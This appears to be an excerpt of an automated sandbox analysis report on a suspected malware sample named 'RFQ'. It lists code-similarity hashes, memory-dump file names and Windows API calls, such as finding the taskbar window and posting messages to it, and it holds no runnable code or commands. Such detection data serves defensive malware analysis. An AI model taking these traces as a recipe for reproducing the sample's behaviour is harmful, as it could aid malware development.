• Opcode ID: 2a06a9fc9ba4cb3380cb394c2c44028d12356c16f7cf1e3b5ae5b60a8af7eef2
• Instruction ID: b7f7500ea484f9571b73d434f9d1355ebf7c601b5c6ee9f40f8da94371c939f2
• Opcode Fuzzy Hash: 2a06a9fc9ba4cb3380cb394c2c44028d12356c16f7cf1e3b5ae5b60a8af7eef2
• Instruction Fuzzy Hash: B7D05B713C531873D22436996C1FFC9764C8B19B96F044025FF08A55C359DEDD5141D9
APIs
• GetSystemDirectoryW.KERNEL32(?), ref: 007AACC0
• FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 007AAEBD
Strings
Memory Dump Source
• Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
Similarity
• API ID: DirectoryFreeLibrarySystem
• String ID: WIN_XPe
• API String ID: 510247158-3257408948
• Opcode ID: f9974859497a1495337d95ec24307762b887e94eb084b291d7efb27be631341d
• Instruction ID: 82b6f1b505d034b76e6669b781e4b77ecb832ae58ec0b7950d03e9056d27cd71
• Opcode Fuzzy Hash: f9974859497a1495337d95ec24307762b887e94eb084b291d7efb27be631341d
• Instruction Fuzzy Hash: 2FE03070C00149EFDB15DFA4D944AECF7B8AB89300F109181E042B2160DB385A44DF36
APIs
• FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 007986E2
• PostMessageW.USER32(00000000), ref: 007986E9
                                                                                                                                                      • Part of subcall function 00777A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00777AD0
                                                                                                                                                    Strings
Similarity
• API ID: FindMessagePostSleepWindow
• String ID: Shell_TrayWnd
• API String ID: 529655941-2988720461
• Opcode ID: 138d9741fbbd51b29268dc516376364bcf55d6ff84b22bcdc86289a693b9e6e4
• Instruction ID: 00d31b0a49f8f7b58872bf6ba01a0bc4307388c206017cf160f88efdc6eb6c71
• Opcode Fuzzy Hash: 138d9741fbbd51b29268dc516376364bcf55d6ff84b22bcdc86289a693b9e6e4
• Instruction Fuzzy Hash: 49D0A931381314BBF23863309C0FFC62A089B08B10F008A14B609EA1C0C8A8AD10CA28
APIs
• FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 007986A2
• PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 007986B5
  • Part of subcall function 00777A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00777AD0
Strings
Similarity
• API ID: FindMessagePostSleepWindow
• String ID: Shell_TrayWnd
• API String ID: 529655941-2988720461
• Opcode ID: 09d45611bed1af533c86c06592fa02836893ec274b40c768c06886e9e452b35d
• Instruction ID: 6a6597a57e7ca6c0d124cd922e665983552123ee39549454cd225a7a83ce34b6
• Opcode Fuzzy Hash: 09d45611bed1af533c86c06592fa02836893ec274b40c768c06886e9e452b35d
• Instruction Fuzzy Hash: 19D0A931384314B7E23863309C0FFC62A089B04B10F008A14B609AA1C0C8A8AD10CA28